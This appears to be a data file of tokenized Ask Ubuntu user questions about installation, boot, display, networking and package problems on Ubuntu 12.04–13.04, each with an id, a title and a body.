297219	installing g95 on ubuntu 12.04	i 'm having trouble installing it . i have followed the steps on the link below but when i try to run g95 on terminal it says it does n't exist . how to install g95 in ubuntu 12.04 this is what it looks like on terminal : marvin @ marvin-macbookpro : ~ $ tar -zxvf g95-x86-linux.tgzg95-install/ g95-install/install g95-install/g95manual.pdf g95-install/bin/ g95-install/bin/i686-pc-linux-gnu-g95 g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/ g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/f951 g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/cc1 g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/crtbegin.o g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/crtbegins.o g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/crtbegint.o g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/crtend.o g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/crtends.o g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/libgcc.a g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/libgcc_eh.a g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/libgcc_s.so g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/libgcc_s.so.1 g95-install/lib/gcc-lib/i686-pc-linux-gnu/4.0.3/libf95.a marvin @ marvin-macbookpro : ~ $ sudo ln -s ~/g95-install/bin/i686-pc-linux-gnu-g95 /bin/g95 [ sudo ] password for marvin : ln : failed to create symbolic link `/bin/g95 ' : file exists marvin @ marvin-macbookpro : ~ $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games marvin @ marvin-macbookpro : ~ $ g95 -- version bash : /bin/g95 : no such file or directory
297220	how do i replace xfce4-screenshooter in xubuntu ?	when i press prnt scrn in xubuntu , xfce4-screenshooter starts . i also installed shutter which has many more options to customize and to compress the screenshot into a smaller , emailable size . is it possible to modify the prnt scrn function so that shutter takes the screenshot instead of xfce4-screenshooter ?
297222	software updater failed to download repository information	when i run software updater it says that it failed to download repository information and to check internet connectivity . i have internet connectivity . how do i fix this ? editing to add content of sources , list : sorry i ca n't figure out how to paste in the content of sources.list without making a huge mess . some of it previews as really large bold print . i tried to follow the block quoting and code rules but it is a huge mess anyway .
297227	displaylink usb on ubuntu 12.04 on laptop	i 'd like to use a displaylink usb uga-2k-a rev b . ( dl-195 ) on my laptop with ubuntu 12.04 i have an asus x53s with intel graphics and nvidia geforce gt 520mx 1gb . i 've read a lot of posts about how to config , but my problem still persist . i 've installed the xserver-xorg-displaylink driver . the monitor goes green , but i still have problem with my xorg.conf this is my last try . section `` serverlayout '' identifier `` x.org configured '' screen 0 `` displaylinkscreen '' 1280 0 screen 1 `` screen0 '' rightof `` displaylinkscreen '' option `` xinerama '' `` off '' endsection section `` serverflags '' option `` randr '' `` on '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection # # # # # # # # # # # # # # # displaylink stuff # # # # # # # # # # # # # # # section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb1 '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' # subsection `` display '' # depth 24 # modes `` 1280x1024 '' # endsubsection endsection and this is the result ... https : //docs.google.com/file/d/0bybqognmd50pcs1pytz1wljcsgc/edit ? usp=sharing where is my fault ? thanks in advance
297230	grub issue in 12.04 : `` booting in blind mode . ''	i just turned on my pc where i 'm dual-booting ubuntu and windows 8 and i had the following message at startup : invalid video mode 'text' booting in blind mode fortunately for me the laptop booted up fine anyways in blind mode and i was able to log in , however i 've googled around and it turns out that this is an issue with grub and it can be more serious in some cases . any idea on how to fix/correct this in a safe manner ? or what could i do to check that my grub does n't have any issues ?
297234	ubuntu one openid failure	failure to login to one.ubuntu.com as well as ubuntu software center from the desktop . attempting to login to one.ubuntu.com results in the following error : `` authentication failed : openid authentication failed : bad signature '' . attempting to make a purchase from ubuntu software center ( steam ) , the screen switches to `` connecting to payment service ... '' followed by an error popup claiming : `` sorry , something went wrong . your payment has been cancelled. '' . this is from ubuntu 13.04 .
297235	why wo n't ubuntu 13.04 work on my computer	i have a dell optiplex gx260 and i tried installing the 32 bit ubuntu 13.04 and when i booted it up and logged in it would n't show the panels . all it would show was the background . any aswers why ?
297238	can i use a 3tb hdd as a boot drive ?	i need a new hdd and plan on getting a 3tb one to fit all my stuff , ubuntu 12.04 install included . so far i only have a 5yr old asus p5qse but sooner rather than later i should have a new system with a new mb so i imagine uefi as well . my questions are : will the full 3tb be usable on my old mb ? and on a new mb ? am i right to ask these questions , is it a bios problem ? or are these matters only relative to windows oss and i should be fine no matter what ?
297239	can dragon video play upnp videos ?	i have plex and minidlna streaming videos via upnp and wondering if there is a way to play my videos on dragon video player ? if not , is there a better kde application to stream videos ?
297244	valgrind - problem with held broken packages	when i try to install valgrind with sudo apt-get install valgrind , i get error : valgrind : depends : libc6-dbg but it is not going to be installed e : unable to correct problems , you have held broken packages . is there any ( safe ) solution for this ? i have ubuntu 13.04 .
297245	how to run a command with one click , preferably from unity 's launcher	i 'd like to run this command without having to open up terminal every time . sudo openvpn -- config /home/ubuntu/documents/vpnbook/vpnbook-euro2-udp25000.ovpn -- auth-user-pass /home/ubuntu/documents/vpnbook/password.txt would it be possible to make a script launchable from unity 's launcher ?
297246	how to manually set a special resolution ?	i 'm using ubuntu 13.04 64 bit for the past short time . after a screen upgrade , i ca n't use/set the right resolution . my old display setting was three 17 '' of 1280x1024 behind a matrox triplehead2go connected to a nvidia gtx480 . all was working fine with a virtual resolution of 3840x1024 . ( triplehead2go emulate a single screen of the total resolution for the os . ) now , i 've upgraded to three 24 '' of 1920x1080 for a virtual resolution of 5760x1080 . but i do n't see this resolution on the ubuntu display settings nor in the xrandr list . how should i use this higher resolution ?
297248	how can i download/install second life ?	i have heard about second life , but i have no idea where to download it from , nor how to download it . what should i do ?
297250	tried to remove ubuntu , stuck with grub	i need help . i tried to install ubuntu 13.04 alongside windows 8 on the same drive ( a ssd ) but all it gave me was problems -- boots in low-graphics mode , gives errors on start up , etc . etc . i 'm done . so i go into windows to remove the two linux partitions , but i forget to expand the rest of the space . so now when i restart i 'm booting into this grub rescue crap , and i do n't know how to get rid of it . any help would be appreciated , i 'm using the live cd now .
297254	do i have the correct .iso file ?	i have a newer intel i-7 laptop , with windows 8 , 64-bit . i downloaded the ubuntu 12.04.2 , 64-bit .iso file ( as recommended on the website ) . i 'm a little concerned because the filename is `` ubuntu-12.04.2-desktop-amd64.iso '' , which sounds like it 's intended for an amd processor . do i have the right file for my intel machine ?
297256	ubuntu 13.04 bootable usb drive- desktop not responding	i have a bootable usb drive that works just fine everywhere but the desktop . the desktop does not show icons or give me the ability to right-click . everything works great except for the desktop . i have n't seen another post on this , so i hope i am not posting a question already answered . thanks for your time .
297266	can not boot into ubuntu 13.04-amd64 after install	i recently decided to migrate to ubuntu after issues with working in windows and remote desktop access . i made a bootable usb flash drive with ubuntu 13.04-amd64 today and proceeded to install on an empty 250 gb hdd . the install went was worry free , however after rebooting all i get is a black screen with a white cursor flashing . i looked around the internet and thought maybe grub did not install correctly . for reference , my system specifications are below : intel i3 2100 , asus p8z68-v le , ati radeon hd 6850 , wd black 640 + intel 40 gb ssd ( windows 7 ) , seagate 1.5 tb ( ntfs data ) , wd 250 gb ( ubuntu ) i tried sudo grub-install -- root-directory=/mnt /dev/sdd1 and i get the error `` path /mnt/boot/grub is not readable by grub on boot . installation is impossible . aborting '' . does anyone have any thoughts ? thanks !
297268	login on 12.04 lts slow after moving /home to separate hdd	on a prior install i had moved the /home to a different hdd to keep the ssd for the os only . on saturday ubuntu crapped out and i had to reinstall , after getting things back to the point of moving the /home drive again to the hdd , everything appeared fine until i logged in after editing the fstab . i can log in fine , but get a black screen with the mouse pointer for about 30-50 seconds , it is pretty consistent time wise . i figure it is something to do with some files in the new /home/john directories that ubuntu is trying to locate/load at login . i 've done some cleanup in ~/.local removing old application folders etc . but nothing seems to help . any thoughts ?
297270	can i dowload ubuntu and quickly change back to windows 8 ?	but i also like the windows 8 that is already on my computer . i 'm not really technologically inclined , so my question to the world is if there is an easy way to switch back and forth between ubuntu os 12 and windows 8 relatively simply once i have downloaded ubuntu ? thanks !
297274	getting linksys n600 to work with ubuntu 13.04 ( 64-bit )	i decided to switch my old computer from windows to ubuntu for my son to use and i ca n't get the linksys n600 wireless adapter to work . if i type lsusb i get the following indicating that its able to recognize the device : bus 001 device 003 : id 13b1:003a linksys ae2500 802.11abgn wireless adapter [ broadcom bcm43236 ] bus 002 device 002 : id 15d9:0a4d trust international b.v. optical mouse bus 002 device 003 : id 1d57:32da xenta 2.4ghz receiver ( keyboard and mouse ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub however , when i type iwconfig i get the following : eth0 no wireless extensions . lo no wireless extensions . any help is much appreciated , thanks !
297276	why my clipboard have content that i never put there ?	i 'm using ubuntu 12.10 with the kde environment . my laptop just shut down from overheating while i was playing minecraft , and when i turned it back on , after a bit , i pressed ctrl+v and it paste 123 . i never copied this and i have no idea how it got on my clipboard . should i be alarmed ?
297277	time clock dual boot win 8 ubuntu 13.04	i finally have dual boot working great with ubuntu 13.04 and windows 8 . the only thing i cant figure out is why the time of day clock is 4 hours off between the 2 os 's . i can set the time on win8 and when i boot ubuntu the time is correct . the next time i boot win8 the time is 4 hours ahead of the correct time . i have fooled around with net based time clock settings on both os 's but no fix there . i have also looked at tz env variables in ubuntu , but no answers there either . is this a kernel param that is compiled in at build time ? any help is appreciated . btw - my laptop is a dell 17r 5520 and it came with win8 preinstalled . i finally figured out the uefi boot bullshit . also grub2 issius .
297282	bootable usb not working	i am trying to install ubuntu on my laptop with a new hard drive and no current operating system , i have went through the process of creating a bootable usb disk using iso to usb , but when i plug it into my laptop and change the bios to boot from usb , it goes to a black screen with a blinking cursor in the top left hand corner .
297286	how do i install sigil ?	is there a ppa i can use to install sigil in ubuntu 13.04 or 13.10 ? the old ppa : rgibert/ebook does n't work for me any more .
297293	a resolution error	i installed ubuntu 12.10 but it only shows 1024x768 resolution but the resulution of my monitor is 1600x900 how can i set the real resolution on ubuntu 12.10 monitor : samsung syncmaster b2030 graphics card : intel hd2000 processor : intel i3-2100 ram : simmtronics 2x2 = 4gb ram please help me thanks in advance
297296	installing ubuntu for the first time and ca n't get to gui	i 've downloaded the iso for the amd64 version of 13.04 and burnt it to a dvd . i can successfully boot off this dvd but instead of being prompted by the welcome screen that appears in every installation tutorial i 've seen , i get a cli ( ubuntu @ ubuntu : ~ $ ) . i 'm unsure what to do from here ... how can i instead boot into a gui ? thanks a lot for any help .
297304	what is the equivalent matlab ?	i am trying to install software similar to matlab and i ca n't go for matlab because its huge download size.so some one suggest me an application which runs similar to matlab .
297310	how to add commands to terminal	how do i teach a new command to the terminal ? i 'm a long time windows user and how i usually do this in windows is to edit the environment path and add the file path to the command that i want to use . like when i want to use phpunit i just add this path to the environment variables : tools/phpunit/vendor/bin/phpunit and then i can just use phpunit file_test.php to run my tests . how do i do that in ubuntu ? thanks in advance !
297312	installation with no iso	i would like to ask two questions about installation with no iso and can some linux-version be favoured gamewise , please . i do want ( perhaps an office type ) linux , might be ubuntu ( or xubuntu ? or equal ) with one of the best available capasity for netgame that puts strain ( as netgames usually does ) on especially the comp 's video capasities ( in this case it 's `` ryzom '' btw. ) . which one of the linux-versioons should i choose ( ie . anything special about the different linux-systems playwise ) ? i ca n't use an iso but my machine works atm . ( with a functioning os , win xp ) that i thought i would replace with a new linux . my old dvd-reader is not working ( on my - now old - machine which is from 2011 iirc . it had - btw . win7 working ) . i have considered especially xubuntu ver . 12 ? i tried booting it from an usb-port but lili says : error , no pae ? ? ( questionmarks because the comp is not very old ) . i can d/l directly to the disk with plenty of room - which should solve the issue , i think .
297313	ubuntu one shows pending uploads on iphone after uploading pictures	using ubuntu one files on iphone . after uploading pictures 5 pictures still show pending upload . these pictures are available on my laptop after syncing . when i try to open iphone-pictures on my iphone with u1 files the app crashes . i 've tried deleting all the pictures off my iphone but it made no difference . so now i need to fix this 'pending upload ' problem and also need to know how to download the pictures back to my iphone . any help would be appreciated ,
297316	wanted to install the windows xp	i have installed the unbutu latest version on my laptop . then i am trying to install the windows xp as dual boot . could any body please suggest me how to do it . i have tried the following procedure , but it is not working 1 ) inserted the xp cd then loading the the cd . but it is not working please can any body give a solution for my problem thanks in advance
297317	myloader segmentation fault ( core dumped )	myloader -- directory= $ db_dump -- queries-per-transaction=50000 \ -- threads= $ threads -- compress-protocol -- verbose=3 \ -- socket= $ mysql_sock -- user= $ mysql_user -- password= $ mysql_pass # ldd /usr/bin/myloader linux-vdso.so.1 = > ( 0x00007fffa8e48000 ) libmysqlclient.so.18 = > /usr/lib/libmysqlclient.so.18 ( 0x00007f44b87e1000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f44b85c4000 ) libz.so.1 = > /lib/x86_64-linux-gnu/libz.so.1 ( 0x00007f44b83ac000 ) libglib-2.0.so.0 = > /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( 0x00007f44b80b0000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f44b7ce8000 ) libssl.so.1.0.0 = > /lib/x86_64-linux-gnu/libssl.so.1.0.0 ( 0x00007f44b7a8a000 ) libcrypto.so.1.0.0 = > /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 ( 0x00007f44b76af000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f44b74ab000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007f44b72a2000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f44b6f9d000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f44b8cfa000 ) libpcre.so.3 = > /lib/x86_64-linux-gnu/libpcre.so.3 ( 0x00007f44b6d5e000 ) # myloader -v myloader 0.5.1 , built against mysql 5.5.27 # mysql -- version mysql ver 15.1 distrib 10.0.2-mariadb , for debian-linux-gnu ( x86_64 ) using readline 5.1 # sh -x ./mydumper_recovery.sh + db_dump=/root/bck/mysql/last_dump + threads=2 + mysql_user=root + mysql_pass= + mysql_sock=/var/run/mysqld/mysqld.sock + myloader -- directory=/root/bck/mysql/last_dump -- queries-per-transaction=50000 -- threads=2 -- compress-protocol -- verbose=3 -- socket=/var/run/mysqld/mysqld.sock -- user=root -- password= segmentation fault ( core dumped ) # cat /etc/issue.net ubuntu 13.04
297325	intellij idea community edition commercial ?	i want to install intellij idea . the free edition which is also the community edition . but when i open the software manager and search for it the install button says `` buy '' ? why do i have to pay for community edition ? i am using ubuntu 13 .
297329	is there any yum to apt-get tool ?	i have a big source code where it wants to install everything where shown of yum ( fedora , centos , red hat package manager ) . example : $ yum install bzip2 cpio curl curl-devel fileutils gettext-devel libtool make nmap openssl openssl-devel libxml2 libxml2-devel php php-devel php-common php-cli php-gd php-pear php-mysql php-pdo php-pecl-json mysql mysql-server mysql-devel yaml root @ sun-m14xr2 : /var/tmp # apt-get install bzip2 cpio curl curl-devel fileutils gettext-devel libtool make nmap openssl openssl-devel libxml2 libxml2-devel php php-devel php-common php-cli php-gd php-pear php-mysql php-pdo php-pecl-json mysql mysql-server mysql-devel yaml reading package lists ... done building dependency tree reading state information ... done package fileutils is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package curl-devel e : package 'fileutils ' has no installation candidate e : unable to locate package gettext-devel e : unable to locate package openssl-devel e : unable to locate package libxml2-devel e : unable to locate package php e : unable to locate package php-devel e : unable to locate package php-common e : unable to locate package php-cli e : unable to locate package php-gd e : unable to locate package php-mysql e : unable to locate package php-pdo e : unable to locate package php-pecl-json e : unable to locate package mysql e : unable to locate package mysql-devel e : unable to locate package yaml and many many other yum package names . it will be lot of time consuming to find them one by one for ubuntu , is there any yum to apt-get package translator ? but how do i interpret it for ubuntu apt-get ? ?
297341	abbyy fine reader like application for ubuntu 13.04	i have a lot of images and what i want to do is to scan those images and get output in ms word file that can be edited later . for windows , i have abbyy fine reader . but i do n't want to go back to windows . please tell me if there is any application that can do the same for me . please help me in this .
297349	gaming black-lit keyboards - do they work on ubuntu ?	i am planning to buy gaming keyboards with back-lit illumination , specifically the saitek k140 . however , i 'm confused whether the black-lit illumination , or the multimedia shortcut keys work with ubuntu ( 13.04 , specifically ) . so , the question is ... do black-lit gaming keyboards work with ubuntu ? if you would be so kind to review the saitek k140 slimline keyboard specifically that would be much appreciated . thanks
297352	internet connection sharing without network manager	i followed these instructions for setting up a shared internet connection with iptables . specifically , i : added a network interface for my second nic in /etc/network/interfaces like so : auto eth1 iface eth1 inet static address 192.168.1.100 netmask 255.255.255.0 entered these rules exactly : sudo iptables -a forward -o eth0 -i eth1 -s 192.168.1.0/24 -m conntrack -- ctstate new -j accept sudo iptables -a forward -m conntrack -- ctstate established , related -j accept sudo iptables -t nat -f postrouting sudo iptables -t nat -a postrouting -o eth0 -j masquerade saved my rules to a file and added it to /etc/rc.local enabled ip forwarding by changing the value of /proc/sys/net/ipv4/ip_forward to 1 uncommented the line net.ipv4.ip_forward=1 in /etc/sysctl.conf restarted now , when i plug my laptop into the eth1 interface , i get an ip address and can ping the gateway , but i ca n't reach anything outside of that . i.e. , i ca n't ping 8.8.8.8 . in case it 's relevant , my other interface is a pppoe connection . it looks like this : auto dsl-provider iface dsl-provider inet ppp pre-up /sbin/ifconfig eth0 up provider dsl-provider auto eth0 iface eth0 inet manual i thought maybe the problem was that dnsmasq was n't assigning nameservers , so i added dns-nameservers 8.8.8.8 8.8.8.4 under both interfaces in /etc/network/interfaces . that did n't help , so i tried adding the nameservers to /etc/resolv.conf . no help there . finally , i tried adding them to /etc/dnsmasq.conf : no-resolv server=8.8.8.8 server=8.8.4.4 this did n't help either . i 'm not sure however if my problem really has anything to do with nameservers or if this is just another case of outdated , worthless documentation . i was able to get this working with network manager at one point , but i did n't like how network manager did n't let me assign a dhcp range . so i 'd like to avoid going back to that .
297354	after 13.04 upgrade system apps are missing ( settings , displays )	i 've upgraded to 13.04 and some things are missing . i can neither open the system settings nor the `` displays '' app to change dual monitor settings . when i click on `` system settings ... '' in the top right corner nothing happens . and on the top right there 's no more date/time shown , i presume i could change that in the settings . how do i get the `` systems settings '' and `` displays '' app back ? i ca n't find the right packages .
297355	porting ubuntu touch : breakfast tool ?	i am trying to port ubuntu touch , but i am stuck at point `` if your device is already supported by cyanogenmod , you can use the same repositories available at github , and get them automatically by calling breakfast , like : breakfast codename '' , but what the hell is breakfast tool ? i have installed all packages they told , i have added phablet-tools ppa and installed what they said . i have upgraded packages but i do not have breakfast app . can someone tell me what it is , how i can get it ? ubuntu 13.04 x64
297357	synaptics touchpad not working after a fresh install of 12.04.2 on a toshiba p850	i have read all related posts i can find but none of them offer a solution . the touch-pad is detected but does not work . it works in windows 8 ( machine is dual boot ) $ egrep -i touchpad syslog may 18 20:44:35 node7 kernel : [ 10.787917 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 may 18 20:44:35 node7 kernel : [ 10.893065 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input10 may 19 09:24:36 node7 kernel : [ 11.728268 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 may 19 09:24:36 node7 kernel : [ 11.861941 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input12 may 19 09:36:21 node7 kernel : [ 11.646728 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 may 19 09:36:21 node7 kernel : [ 11.776112 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input11 in particular this does not work , it just causes compiz to crash and restart : $ sudo modprobe -r psmouse $ sudo modprobe psmouse proto=imps may 19 09:48:12 node7 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1101 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped may 19 09:48:42 node7 rsyslogd : last message repeated 2 times may 19 09:49:41 node7 gnome-session [ 2106 ] : warning : application 'compiz.desktop ' killed by signal may 19 09:49:41 node7 gnome-session [ 2106 ] : warning : app 'compiz.desktop ' respawning too quickly may 19 09:49:41 node7 gnome-session [ 2106 ] : critical : we failed , but the fail whale is dead . sorry ... . may 19 09:49:50 node7 anacron [ 1249 ] : job `cron.daily ' terminated may 19 09:49:50 node7 anacron [ 1249 ] : normal exit ( 1 job run ) may 19 09:50:09 node7 kernel : [ 844.392522 ] input : ps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input16 may 19 09:50:51 node7 kernel : [ 886.068210 ] type=1400 audit ( 1368953451.556:35 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1194 comm= '' cupsd '' pid=1194 comm= '' cupsd '' capability=36 capname= '' block_suspend ''
297358	can not install language support	when i run 'language support ' in system config . it gives me below . after i run 'sudo apt-get update ' and 'sudo apt-get install -f ' , the problem still exists . i run 12.04 amd64 . thanks edit later : today when i run 'sudo apt-get install -f ' , it let me run 'sudo dpkg -- configure -a ' first . when i run 'sudo dpkg -- configure -a ' , it gives me errors like the post . i run sudo rm /var/lib/dpkg/updates/000* sudo apt-get clean sudo apt-get update now i can run 'sudo dpkg -- configure -a ' , 'sudo apt-get install -f ' and language support successfully .
297361	programs look ugly with clearlooks-phenix theme , how to fix ?	some programs on firefox seem to become unthemed when i use clearlooks-phenix on ubuntu 13.04 . this did n't happen on 12.04 , and it seemed to be triggered by some update . what could have caused it ?
297364	how to add mount_afp to system startup	i have a feeling this is a really dumb question but ... ... i am running ubuntu 13.04 and i am running the following command to connect to my apple time capsule mount_afp afp : //user : password @ server_host_or_ip/data ~/capsule i currently run this from the terminal after i login but i would like to run this automatically at startup as an ubuntu newbie i 'm stumped as to where to look to do this any / all help appreciated @ thefourtheye - here 's the contents of rc.local # ! /bin/sh -e mount_afp afp : //user : password @ server_host_or_ip/data ~/capsule exit 0
297365	remove opera 's system tray icon	i installed opera on lubuntu 13.04 , and opea places an icon in the system tray . really odd and unacceptable behavor . is there a setting in opera which allows you to remove the system tray icon ?
297369	chat over lan with win7 pc ?	i have two pcs ( one win7 and one ubuntu 13.04 ) connected to the internet via the same router , on the same wi-fi network . is there any software i can install on both pcs so that the two users can text chat with each other over the lan , without access to anyone else on the internet ?
297370	problem with extract a .tar.gz file	i 've download a '.tar.gz ' file from here . file size is 152 mb . downloaded file size is 450 mb on my computer ! ! i tried to extract that file but i get below error : gzip : stdin : invalid compressed data format violated tar : unexpected eof in archive tar : error is not recoverable : exiting now
297375	unity and ubuntu-desktop disappeared and i am unable to reinstall it !	i am running ubuntu 13.04 . after running a normal upgrade , unity disappeared ( after login , i have the desktop , without the launch abd status bar , no dash , etc. ) . if i try to reinstall ubuntu-desktop , i get unmet dependencies : vmalep @ x220t : /mnt/sda2/home/vmalep $ sudo apt-get install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . ubuntu-desktop : depends : unity but it is not going to be installed e : unable to correct problems , you have held broken packages . unity is a bit more explicit : vmalep @ x220t : /mnt/sda2/home/vmalep $ sudo apt-get install unity reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . unity : depends : libunity-core-6.0-5 ( = 7.0.0daily13.04.18~13.04-0ubuntu1 ) but it is not going to be installed depends : unity-common ( = 7.0.0daily13.04.18~13.04-0ubuntu1 ) but 7.0.0daily13.05.16ubuntu.unity.experimental.certified-0ubuntu1 is to be installed recommends : gnome-control-center-unity but it is not going to be installed recommends : unity-lens-friends but it is not going to be installed recommends : unity-lens-shopping but it is not going to be installed recommends : indicator-bluetooth but it is not going to be installed e : unable to correct problems , you have held broken packages .
297376	lubuntu 's asking password for shutting down	i 've lubuntu 13.04 64 bit on my lenovo y570 . system works well but lubuntu 's asking my password when i want to shutdown or restart the computer . how can i fix it ?
297379	why is my laptop so hot suddenly ?	after an update my laptop is extremely hot . normally i let it run for a couple of days without a single problem , but suddenly it is starting to feel very hot , and the fan is blowing like hell , but i didnât do anything weird
297380	how to install hp laserjet professional m 1213 nf mfp series ?	please help me to install hp laserjet professional m 1213 nf mfp series ?
297391	how do i acces the windows network ?	i have ubuntu 13.04 64 bit and windows 8 dual booted . i have a network that is a windows one . in recent versions of ubuntu , i was n't able to acces it . i hoped that ubuntu 13.04 would fix that but it did not . when i go to network and click on windows network unable to access location failed to retrieve share list from server : no such file or directory i do not know how to make it work . please help
297397	google chrome profile in use ; browser does not start anymore	this is the problem when i click on google chrome : the profile appears to be in use by process 2747 on host uber-c07b01 . if you are sure no other processes are using this profile , delete the file /home/user/.config/google-chrome/singletonlock and relaunch google chrome .
297399	how to get webcam working with skype on ubuntu 13.04 ?	in the past i was able to get my webcam working with skype using the fix described here : skype video not working after upgrade from 11.10 to 12.04 it meant starting skype with : ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype this worked well on ubuntu 12.04 , but does n't work anymore on ubuntu 13.04 . probably because the executable file in /usr/bin/skype is replaced by a script that says : # ! /bin/sh # # tip in https : //launchpad.net/bugs/1002187 , comment # 31 # # bug filed against skype : https : //jira.skype.com/browse/scl-980 # export ld_preload= '' /usr/lib/i386-linux-gnu/mesa/libgl.so.1 $ { ld_preload : + : } $ ld_preload '' exec /usr/lib/skype/skype `` $ @ '' it seems that this script is needed to work around a bug to start skype on ubuntu 13.04 but it is probably also overriding my own webcam fix and i guess that 's the reason it is not working anymore . so i need to add my webcam fix to this script , but i have a hard time finding out how ? any help with this ?
297400	how to install and run scilab manually ?	firstly , i saw topics such as 'how to install manually a software ... ' but my problem does n't solved ! i 've downloaded scilab 5.4.1 from official website . and i extract '.tar.gz ' file in : /home/scilab-5.4.1 directory . i tried below commands but get several errors : $ cd scalib-5.4.1 $ configure @ 1 $ make @ 2 $ make install @ 3 termianl messages : @ 1 : configure : command not found @ 2 : make : * no targets specified and no makefile found . stop . @ 3 : make : * no rule to make target `install ' . stop . i tried following terminal-command to run that : $ cd scilab-5.4.1 $ cd bin $ scilab termianl message : the program 'scilab ' is currently not installed . you can install it by typing : sudo apt-get install scilab
297406	ubuntu 13.04 not booting after upgrade from 12.10	this is duplicate post from here after upgrading to 13.04 , i was able to boot into ubuntu . i made change a line in grub from grub_cmdline_linux= '' '' to ub_cmdline_linux= '' acpi_backlight=vendor '' then sudo update-grub & & sudo reboot after this i am not able to boot into ubuntu . i am able to reach grub , but i do n't know what to do . please please help me , i am struggling from this from last 2-3 days .
297410	lenovo ideapad p400 - disabling the annoying requirement for the fn key to use f1-f12	on lenovo laptops , in order to use f5 you need to press fn-f5 ( same with f1-f12 ) . it 's really annoying and i 'd like to reverse the situation . on windows , a lenovo driver could help : http : //forums.lenovo.com/t5/thinkpad-edge-s-series/disable-fn-keys-e420/td-p/803609 how can i resolve this on ubuntu 12.04 ? i could n't find lenovo drivers for linux . update : found a peculiar solution for this on windows . can anyone recommend a good equivalent for xubuntu : http : //forums.lenovo.com/t5/ideapad-y-u-v-z-and-p-series/how-do-you-reset-the-function-keys-on-a-p500-ideapad-to-legacy/td-p/958995
297412	how do i make udev rules work ?	i would like to learn udev rules . here is what i do : victor @ x301a1 : ~ $ ls /etc/udev/rules.d/ 70-persistent-cd.rules 70-persistent-net.rules readme then : victor @ x301a1 : ~ $ sudo gedit /etc/udev/rules.d/01-my-first-udev.rules my rule : action== '' add '' , run+= '' echo hello ! > /home/victor/udev_test_log.txt '' after saving the file : sudo udevadm control -- reload-rules i expected that connecting an usb device would write in the file but nothing happen . where am i wrong ?
